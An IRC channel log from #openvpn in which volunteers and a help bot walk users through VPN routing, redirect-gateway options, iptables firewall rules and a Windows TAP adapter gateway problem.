my 'most interesting problem of the month' award that I just made up 05:09 < holmen> haha thank you :) 05:09 <+pekster> I enjoy subtle problems like that; it keeps me on my guard from assuming too much for my own good 05:09 < holmen> THe down side is that im quite the noob on openvpn and probably will fail on this but trail and error is key :) 05:11 <+pekster> Well, the only ovpn-changes I think you need are using the 'local' flag to --redirect-gateway, and 2 scripts at --route-up and --down. The route-up script needs to add the route as I explained above to your VPN endpoint (there's a variable for that, see the 'SCRIPTING AND ENVIORNMENTAL VARIABLES' manpage section) while the down script needs to remove it on VPN disconnect 05:11 <+pekster> So, 3 changes to the ovpn config, and 2 scripts that you can probably do with a single line of code 05:12 <+pekster> holmen: I think the var you want is $trusted_ip 05:12 <+pekster> FYI 05:12 <+pekster> (available in both --route-up and --down) 05:13 <+pekster> Try something along the lines of '/sbin/ip route add $trusted_ip/32 via $YOUR_ETH1_IP_HERE' 05:14 <+pekster> In the upscript, and the reverse (ip route del ...) in --down 05:21 -!- Assid|2 [~assid@122.170.9.45] has quit [Read error: Connection reset by peer] 05:21 -!- daemon [staff@hashweb.org] has quit [Read error: Connection reset by peer] 05:21 -!- daemon [staff@hashweb.org] has joined #openvpn 05:21 -!- nullsign [~nullsign@daedalus.genom.com] has quit [Read error: Operation timed out] 05:21 -!- daemon is now known as Guest47187 05:21 -!- batrick [~batrick@nmap/developer/batrick] has quit [Read error: Operation timed out] 05:21 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 05:22 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 05:22 -!- nullsign [~nullsign@daedalus.genom.com] has joined #openvpn 05:24 -!- batrick [~batrick@nmap/developer/batrick] has joined #openvpn 05:30 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Ping timeout: 276 seconds] 05:40 < holmen> pekster: one quick question. How should i use the --redirect-gateway. You mention that i should use the "local" flag. So "--redirect-gateway local" or "--redirect-gateway " ? 05:40 <+pekster> Yea, 'local' is a literal flag. You're already using the 'def1' flag (notice your 2 /1 route overrides on your default gateway) 05:40 <+pekster> Manpage has details on the usage of each flag 05:43 < holmen> gonna change ssh connection and try it out. 05:43 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Quit: leaving] 05:45 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn 05:56 < holmen> pekster: hmm, 1 error when trying to execute the up script manually 05:56 < holmen> holmen@filserver:~$ sh openvpn/up 05:56 < holmen> Error: an inet prefix is expected rather than "/32". 06:01 < holmen> entry in "up": /sbin/ip route add $trusted_ip/32 via 5.150.223.121 06:01 < holmen> and file set to be executable 06:07 < holmen> While starting the tunnel i get this log message: 06:07 < holmen> Mon Jan 14 13:06:08 2013 ROUTE default_gateway=192.168.1.1 06:07 < holmen> thing that is my problem? 06:12 < holmen> while tunnel active: 06:12 < holmen> holmen@filserver:~$ ip route show 06:12 < holmen> 0.0.0.0/1 via 46.246.23.129 dev tap0 06:12 < holmen> default via 192.168.1.1 dev eth0 metric 100 06:12 < holmen> x.x.x.x/17 dev eth1 proto kernel scope link src x.x.x.x 06:12 < holmen> 46.246.23.128/25 dev tap0 proto kernel scope link src 46.246.23.180 06:12 < holmen> 80.67.8.203 via x.x.x.x dev eth1 06:12 < holmen> 80.67.8.211 via x.x.x.x dev eth1 06:12 < holmen> 128.0.0.0/1 via 46.246.23.129 dev tap0 06:12 < holmen> 192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.2 06:13 < holmen> Mon Jan 14 13:12:32 2013 WARNING: Failed running command (--up/--down): could not execute external program 06:15 < holmen> I fixed the up/down scripts by removing the "/32" but it still wont execute it whilst starting openvpn 06:17 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:18 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 06:25 -!- Guest47187 [staff@hashweb.org] has left #openvpn [] 06:30 -!- thinkHell [~Hell@ks399220.kimsufi.com] has quit [Quit: ["pop()"]] 06:30 < holmen> pekster: I see now what may be my problem, in "ip route show all" the eth1 routing is as following: 06:31 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 240 seconds] 06:31 < holmen> x.x.128.0/17 dev eth1 proto kernel scope link src x.x.223.x 06:31 < holmen> notice the changes in subnet.. 06:32 < holmen> then my extra roiuting table "openvpn" looks like this: 06:33 < holmen> holmen@filserver:~$ ip route show table openvpn 06:33 < holmen> default via x.x.223.x dev eth1 06:33 < holmen> x.x.223.x dev eth1 scope link src x.x.223.x 06:34 < holmen> but the odd thing is that i can connect to the internet via eth1 on the 223 subnet. :S 06:44 <+pekster> holmen: The redirect-gateway OpenVPN directive will only operate on your main table, IIRC 06:44 <+pekster> With policy routing you'll likely need to handle adjustments to other tables via the --route-up and --down scripts, or use --route-noexec (see the manpage for details) and then you are expected to manage all route changes that are passed to you as env-vars instead of having OpenVPN automatically manage them 06:46 < holmen> holy crap. I think this issue just got past my skill level :/ 06:48 <+pekster> Policy routing and split-route setups are complex enough with just the 2 interfaces, but now you're trying to stack redirection of both across a VPN link too ;) 06:50 < holmen> Hmm i dont know if i misenterpret you know but i only want one interface to go into the tunnel . 06:50 <+pekster> Oh, in that case then the changes I noted earlier to keep the VPN-host-exception routed via NIC#2's public IP should do the trick 06:51 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 06:51 <+pekster> You don't need to worry about your 2nd table controlling the NIC#2 traffic beyond adding a host-route (the /32 thing) out via NIC#2's public IP 06:51 < holmen> Ok but when setting up the tunnel i get the log message of Defaulkt gateway being the NIC#1 gateway 06:52 <+pekster> RIght, but if you use the 'local' option, then you can override the implied error resutling from that setup 06:52 <+pekster> See, without the 'local' flag, OpenVPN will add a route to your external IP of the VPN server so it is *not* routed across the VPN (you need this because you can't route your encrypted VPN packets over the VPN: see the problem with that?) 06:53 <+pekster> So, once you understand why that needs to be added, you can pass the 'local' flag to not do that automatically (which uses your exsiting default gateway on NIC#1) and instead manage that same feature yourself by sending traffic to the VPN host out NIC#2 06:53 <+pekster> Hence the 'ip route add $trusted_ip/32 via $public_ip_on_nic2' line 06:54 <+pekster> You need that on the routing table responsible for traffic generated by NIC#2 where your openvpn instance is running 06:54 <+pekster> After that, the magic of --redirect-gateway will override your default route on NIC#1 by adding the 2 routes with the /1 mask (128.0.0.0) that define the entire Internet. This sends them via your VPN peer IP over the tun device 06:56 <+pekster> So, with the --route-up and --down script, I think you'll be set, but only if the gateway you wish to override is on your main routing tnable (not a sub-table you're sending stuff to with a custom 'ip rule' setup.) Is that the case, or is your configuration more complex? 06:56 < holmen> Ok. Its a lot to take in but i get the jist of it i think. Can io PM you my setup files and program execution lines for further knowledge? 06:57 <+pekster> Sure, although I'll try to keep discsussion here if you don't mind (if you don't want your private configs posted here feel free to PM them) but others might benefit from the overall discussion, or even see something I miss 06:57 < holmen> Ofc 06:58 <+pekster> At the very least, I can see what you have now to make sure I get what you have and what's configured; it'd be helpful in addition to client ovpn config files to get the scripts, plus the output of 'ip route show table all' 06:58 <+pekster> 'ip addr show' would be useful too so I know what I'm actually looking at :P 06:59 <+pekster> I'll be around, so if I don't respond right away I'm probably just in another window for a bit 07:09 -!- brute11k [~brute11k@89.249.230.77] has quit [Ping timeout: 272 seconds] 07:17 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Ping timeout: 272 seconds] 07:19 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 272 seconds] 07:23 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 07:46 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 07:46 < AsadH> novaflash ! 07:46 < novaflash> mm? 07:46 < AsadH> I found you 07:46 < AsadH> That's all 07:47 < novaflash> mm. 07:47 -!- centurio [~opera@anon-185-82.vpn.ipredator.se] has joined #openvpn 07:47 < centurio> hello 07:48 < centurio> May I ask for help about iptables? 07:48 <+pekster> centurio: As it relates to OpenVPN, go for it; depending on your question it's possible #netfilter may be a better place to ask, but you're welcome to try here first 07:51 < centurio> thanks 07:51 < centurio> I'm running openvpn client on a dd-wrt router 07:52 < centurio> I have modified the iptables contrary of what my vpn provider told me 07:53 < centurio> the problem was that the dns requests were not passed through the clients on my network 07:53 < centurio> only my isp dns servers, which don't work once the tunnel is up 07:54 < centurio> dnsmasq is set tu use public servers 07:54 < centurio> http://www.pastebay.com/1174089 07:54 < centurio> I pasted my previous config and my new config 07:54 < centurio> the new config works, I do not have to set static dns on every client of my network 07:55 < centurio> but I'm not sure the new config is secure 07:55 < centurio> I use it together with --up 07:55 <+pekster> You can remove line 20 as it's worthless 07:56 < centurio> ok 07:57 <+pekster> Otherwise sure; the only forwarded traffic from tun0 to br0 will be stuff bound for your private clients, otherwise it'll end up on INPUT. You should really only accept --state RELATED,ESTABLISHED traffic there instead 07:57 <+pekster> Then you don't need to switch rulesets when you start/stop the VPN 07:57 <+pekster> Just use the 2nd one and you'll be set 07:59 <+pekster> No idea why you're using -I all over the place either; if you call those scripts over and over you'll just keep inserting more and more rules into your kernel; you should really use iptables-restore for that, and pass it a file you create with iptables-save (unless you really need rules to be dynamically managed) 08:01 < centurio> I was advised to do so 08:01 < centurio> alternatively, I can create a down script removing all the rules 08:02 < centurio> should I replace -I by -A? 08:03 <+pekster> I don't really have a clue how your setup is. If that's your only VPN (and will thus always been tun0) you can just leave your ruleset in place persistently and not worry about overriding the existing chains when the VPN comes up 08:04 < centurio> yes, it's my only vpn 08:04 <+pekster> With OpenWRT you should be hooking into the existing chains (they have special user chains for stuff like this you're supposed to be using.) I don't know what they are offhand because my OpenWRT setup has a firewall I wrote from scratch, so it's nothing like a standard setup 08:04 <+pekster> They have something named 'user_forward' and 'user_input' or something to that effect 08:05 <+pekster> (personally, I think the OpenWRT default is really messy and ugly and hard to follow, but it's all magically supported by LuCI, so it stays that way) 08:05 < centurio> lot's of people advised me to go OpenWRT 08:05 <+pekster> If you can post your OpenWRT ruleset via 'iptables-save' to a pastebin site (after a reboot or something would be good so all your rule inserts don't pollute the output) I might be able to suggest a solution 08:06 <+pekster> centurio: Yes, the distro is fine. Managing custom iptables rules with a VPN is non-trivial to set up, however. I can likely give you a suggestion if I get a defult ruleset that you can add to /etc/firewall.user 08:06 <+pekster> The OpenWRT firewall is "not simple" 08:09 < centurio> hmm I can't get iptables to show me the current rules 08:11 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 08:12 <+pekster> Don't use iptables; it's a bad way to dump rules 08:12 <+pekster> 'iptables-save' is what you should be using 08:13 < centurio> iptables-save :not found 08:16 < centurio> looks like I can't do this on dd-wrt 08:18 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 272 seconds] 08:18 < centurio> so I uploaded a new version 08:18 < centurio> http://www.pastebay.com/1174104 08:20 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 272 seconds] 08:21 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Quit: Nettalk6 - www.ntalk.de] 08:22 <+pekster> centurio: Well, you can pastebin 'iptables -nvL' and 'iptables -t nat -nvL' and 'iptables -t mangle -nvL' as wel 08:23 <+pekster> Stupid dd-wrt devs not making that a default feature 08:26 < centurio> iptables -nvL: http://www.pastebay.com/1174110 08:27 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 08:28 < centurio> 'iptables -t nat -nvL: http://www.pastebay.com/1174111 08:29 <+pekster> centurio: Okay, as the #dd-wrt folks how to add these rules to your firewall on-boot: https://pastee.org/5cbwp 08:29 < centurio> iptables -t mangle -nvL: http://www.pastebay.com/1174112 08:30 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has joined #openvpn 08:30 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has quit [Changing host] 08:30 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:30 <+pekster> You'll the need to figure out how to route them via that link 08:30 <+pekster> No clue if you're already using a 'redirect-gateway' setup, but if not you'll need to write some routing rules to do that in addition to the firewall config 08:32 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 08:37 < centurio> ok 08:37 < centurio> thanks for the help 08:37 <+pekster> Yup. All that -I crap kept inserting new rules in your firewall, so you probably want to reboot if you don't know how to reload your firewall to its proper setup 08:38 < centurio> these rules you pasted are in addition of what I also pasted here: http://www.pastebay.com/1174104 08:38 <+pekster> No 08:38 <+pekster> In place of that 08:38 < centurio> cool 08:38 < centurio> much more neat 08:38 <+pekster> Don't run stuff like that each time you connect to the VPN; it's really bad for your ruleset 08:39 <+pekster> Dynamic managing of your ruleset on-event like requires advanced scripting and knowledge of the netfilter (aka "iptables") sytem 08:39 < centurio> that is out of my league 08:39 <+pekster> So: don't do it! (unless you really know what you're doing.) Whoever gave you that script had no clue what they were doing 08:39 < centurio> nice 08:40 <+pekster> Just use the crap I gave you for your firewall; as the dd-wrt folks how to apply it when your ruleset starts up 08:40 <+pekster> That's not routing mind you, just thte firewall to permit access how you need 08:41 < centurio> ok 08:41 < centurio> thanks for the advice 08:41 < centurio> I'll let you know how it turns out 08:48 -!- centurio [~opera@anon-185-82.vpn.ipredator.se] has quit [Ping timeout: 256 seconds] 08:59 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 09:02 -!- Orbital [~opera@anon-184-93.vpn.ipredator.se] has joined #openvpn 09:03 -!- Orbital is now known as Guest97591 09:05 -!- Guest97591 [~opera@anon-184-93.vpn.ipredator.se] has left #openvpn [] 09:06 -!- Guest97591 [~opera@anon-184-93.vpn.ipredator.se] has joined #openvpn 09:15 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 09:21 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 09:21 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 09:22 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has joined #openvpn 09:22 -!- ade_b [~Ade@109.58.51.110.bredband.tre.se] has quit [Changing host] 09:22 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:25 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:33 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:37 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 264 seconds] 09:40 -!- Guest97591 [~opera@anon-184-93.vpn.ipredator.se] has quit [Ping timeout: 252 seconds] 09:41 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 09:44 -!- Azrael808 [~peter@212.161.9.162] has quit [Client Quit] 09:45 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 10:06 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 272 seconds] 10:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:11 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 10:11 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 272 seconds] 10:11 -!- Alanonzander [~azander@209.124.51.200] has joined #openvpn 10:12 < Alanonzander> !welcome 10:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample 10:12 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 10:12 < Alanonzander> !redirect 10:12 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 10:12 <@vpnHelper> http://ircpimps.org/redirect.png 10:13 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 10:17 < Alanonzander> I need assistance getting an internal OpenVPN client to send _some_ of it's output via the openVPN server. What I need is some examples to help me understand what I need to do. I have looked at the redirect from the bot, and it only helps to confuse me. 10:17 -!- Orbi [~opera@anon-149-38.vpn.ipredator.se] has joined #openvpn 10:17 <@ecrist> !goal 10:17 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 10:17 <@ecrist> we need more specific information of what you mean by _some_ 10:18 < Orbi> @pekster 10:18 < Alanonzander> I need to proxy a SFTP and a Soap/WSDL connection through the VPN. 10:18 < Alanonzander> both are outgoing from the client. 10:18 <@ecrist> are those connections made to a specific IP? 10:18 < Alanonzander> yes 10:18 <@ecrist> is that IP on the VPN, or somewhere else? 10:19 < Alanonzander> elsewhere 10:19 <@ecrist> so, you need to first setup a VPN (don't worry about sending traffic to/from anywhere yet) 10:19 <@ecrist> start there, let me know when that's done 10:19 < Alanonzander> I ahve done that 10:20 <@ecrist> !configs 10:20 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 10:20 < Alanonzander> The VPN works for client-to-client connections now. 10:21 <@ecrist> ok, so you need to add that special IP to your server config in a push "route..." line 10:21 <@ecrist> and configure the vpn server to nat traffic going out to that IP properly 10:22 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 252 seconds] 10:22 -!- master_of_master [~master_of@p57B521B9.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 10:22 < Alanonzander> Examples? 10:22 <@ecrist> !man 10:22 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 10:23 <+pekster> Orbi: you asked about redirection: see this for info: 10:23 <+pekster> !redirect 10:23 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 10:23 <@vpnHelper> http://ircpimps.org/redirect.png 10:24 -!- master_of_master [~master_of@p57B54C0D.dip.t-dialin.net] has joined #openvpn 10:24 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has joined #openvpn 10:25 < Alanonzander> ecrist, everything you have pointed me to only serves to confuse me more. 10:26 < Alanonzander> please assume I know NOTHING about networking 10:26 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 10:29 -!- Porkepix [~Porkepix@88-190-200-7.rev.dedibox.fr] has quit [Ping timeout: 252 seconds] 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:35 <@ecrist> Alanonzander: we're not here to teach you networking 10:35 <@ecrist> !101 10:35 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 10:36 -!- AsadH is now known as zz_AsadH 10:36 < |Mike|> nice one 10:37 < Alanonzander> Not asking for that, asking for EXAMPLES. So much for this being a place to get help. 10:37 -!- Alanonzander [~azander@209.124.51.200] has quit [Quit: Leaving] 10:37 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 10:37 -!- mode/#openvpn [+b *!*@209.124.51.200] by ecrist 10:38 < Rienzilla> lol 10:39 < gladiatr> oo... shiny 10:41 < Orbi> !def1 10:41 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 10:41 <+pekster> Orbi: Ask questions in the channel, since I'm not your personal paid support 10:42 <+pekster> That said, the client can add 'redirect-gateway' values to its own config; the client LAN won't be visible to the server or any networks behind it, so you'd need NAT to support local systems behind a VPN peer acting as a client 10:43 < Orbi> !ipforward 10:43 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 10:43 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.] 10:43 < Orbi> !linipforward 10:43 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 10:43 <@ecrist> !factoids 10:43 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 10:46 <+pekster> Orbi: Really? Come on, no more PMs for conversation that obviously belongs in the channel. Last warning before I stop caring about your questions completely. Did you read the flowchart you were linked via the !redirect bot message? That's all stuff you do client side, not server-side 10:47 <+pekster> You can push it from the server, but you're not required to. See the 2nd flowchart box specifically 10:49 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:49 < Orbi> @pekster got it 10:49 < Orbi> !man 10:49 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 10:50 < Orbi> !nat 10:50 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 10:50 < Orbi> !linnat 10:50 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 10:50 <+pekster> All the flowcharts the bot has were written in such a way that they cover each step you need to take, in order, to accomplish your task 10:51 <+pekster> You probably have your NAT worked out with the -j MASQUERADE for traffic goign out your tun interface in your netfilter/iptables rules. But you shouldn't worry about that if you're trying to redirect the gateway, since you need *that* working before you can worry about NAT. Just follow the flowchart, and don't skip steps 10:52 -!- dazo is now known as dazo_afk 10:53 -!- b1rkh0ff [~b1rkh0ff@178.77.6.46] has quit [Read error: Connection reset by peer] 10:56 -!- Orbi [~opera@anon-149-38.vpn.ipredator.se] has quit [Ping timeout: 256 seconds] 10:57 -!- Orbi [~opera@56.52-65-87.adsl-dyn.isp.belgacom.be] has joined #openvpn 11:02 -!- Orbi [~opera@56.52-65-87.adsl-dyn.isp.belgacom.be] has quit [Ping timeout: 272 seconds] 11:03 -!- Orbi [~opera@anon-184-31.vpn.ipredator.se] has joined #openvpn 11:03 -!- raidz_away is now known as raidz 11:04 < Orbi> I enabled redirect-gateway def1 11:04 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 252 seconds] 11:04 -!- pelle2_ is now known as pelle2 11:04 < Orbi> I went through all the steps 11:05 < Orbi> !ipforward 11:05 <@vpnHelper> "ipforward" is please choose between !linipforward !winipforward !osxipforward and !fbsdipforward 11:05 < Orbi> !linipforward 11:05 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 11:07 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:08 < Orbi> probably a dumb question, but just to be sure: I followed the flowchart all the way to "It Works!" 11:08 < Orbi> does that mean that IP forward is enabled? 11:09 <+pekster> Yes; routers don't work unless they are forwarding IP packets 11:09 < Orbi> so I don't need this rule: iptables -I FORWARD -i tun+ -j ACCEPT 11:10 <+pekster> Maybe not; the preferred way to accept traffic from potentially unkonwn sources is to use stateful firewall rules 11:11 <+pekster> -i $some_external_facing_interface --state ESTABLISHED,RELATED -j ACCEPT 11:11 <+pekster> or such 11:11 < Orbi> Everything works without that rule, so better to leave it so 11:11 <+pekster> You might benefit from some basic tcp/ip reading: 11:11 <+pekster> !tcpip 11:11 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 11:12 < Orbi> yes, I certainly could 11:12 <+pekster> Higher level features like VPN operation is going to be very hard if you don't have a good handle on the basics 11:12 < Orbi> thanks for the tip and your helpful support. I'm going to read that. 11:15 < Orbi> is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf still active? 11:16 < Orbi> nevermind, opera does not want to open it. 11:17 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 11:26 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 255 seconds] 11:29 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has joined #openvpn 11:32 < Orbi> I'm confused, should I use: iptables -t filter -A lan2wan -i br0 -o tun0 -j ACCEPT or 11:32 < Orbi> iptables filter -A lan2wan -i br0 -o tun0 -j ACCEPT ? 11:34 <+pekster> -t filter, or leave it off because filter is the default table 11:34 <+pekster> See the iptables manpage for usage details 11:35 < Orbi> yes, I was reading that, that's why I was asking :) 11:40 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:40 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:40 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 11:40 -!- Orbi [~opera@anon-184-31.vpn.ipredator.se] has quit [Ping timeout: 264 seconds] 11:41 -!- Orbi [~opera@anon-149-224.vpn.ipredator.se] has joined #openvpn 11:45 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 11:46 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:46 -!- Orbi [~opera@anon-149-224.vpn.ipredator.se] has quit [Ping timeout: 252 seconds] 11:47 -!- Lord-M [~LordM@ip-80-113-202-148.ip.prioritytelecom.net] has joined #openvpn 11:47 < Lord-M> Anybody around who can help me with an issue I'm having after upgrading from OpenVPN 2.2.2 to 2.3.0 (on Windows)? 11:48 -!- Orbi [~opera@109.129.27.94] has joined #openvpn 11:50 <+pekster> Lord-M: What specifically are you having problems with after the upgrade? Is everything else (config files, any scripts, ccd setup, etc all the same too?) 11:50 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 11:51 < Lord-M> TAP adapter is not getting a default gateway anymore (connection works just fine, configuration files unchanged) 11:52 <+pekster> Can you try deleting all tap adapters and creating a new one? The 'delalltap.bat' script is no longer installed by default, but just re-install the 'tap-windows.exe' program from your \bin\ directory and you'll get it back 11:52 -!- zz_AsadH is now known as AsadH 11:52 < Lord-M> I'll give it a try 11:52 <+pekster> It'll be under a separate programs directory called 'TAP-Win32' (or a similar name, but it begins with TAP) 11:55 -!- AsadH is now known as zz_AsadH 11:57 < Lord-M> removed and reinstalled, doesn't appear to make a difference... 11:57 < Lord-M> did anything change with respect to the handling of the default gateway in a bridged setup? 11:58 <+pekster> What's delivering the gateway? OpenVPN, or an actual DHCP server at the remote end attached to the bridge? 11:58 < Lord-M> DHCP server at the other end 11:58 < Lord-M> I see a lot of "Mon Jan 14 18:57:48 2013 Extracted DHCP router address: 192.168.xx.x" in the log 11:59 < Lord-M> but it doesn't appear to get picked up on the client side 12:01 <+pekster> I'm not aware that anything changed, although I'm not sure what OpenVPN would be caring about the dhcp traffic since my understanding was that was left to the tap driver in a bridged setup like that 12:03 <+pekster> Lord-M: Try adding a --route-delay option perhaps? 12:03 < Lord-M> Tried that, that's actually where the fun starts... ;) 12:03 <+pekster> :\ 12:03 < Lord-M> :P 12:04 < Lord-M> I've been trying to get it to set "route 0.0.0.0 0.0.0.0" with the default gateway set through DHCP using "route-gateway" 12:04 < Lord-M> using a route-delay of 10 seconds to ensure it's available 12:04 < Lord-M> when I try that, OpenVPN seems to ignore the delay... 12:05 < Lord-M> when I manually do ""route 0.0.0.0 0.0.0.0 192.168.x.x" everything works just fine 12:05 <+pekster> I've generally found the 'tap-delay' parameter to give better results under most Windows platforms 12:05 < Lord-M> ah k, I'll give that one a try 12:05 <+pekster> My "usual" make Windows suck-less options tend to be: --ip-win32 dynamic --route-method exe --tap-sleep 5 12:05 <+pekster> Sometimes I'll use the value of 10 instead 12:05 <+pekster> Sometimes I mix it up, but for some reason I keep coming back to that magic set of options 12:06 <+pekster> Take it with a grain of salt, since I don't do much with tap (now and then, but not often) 12:08 <+pekster> 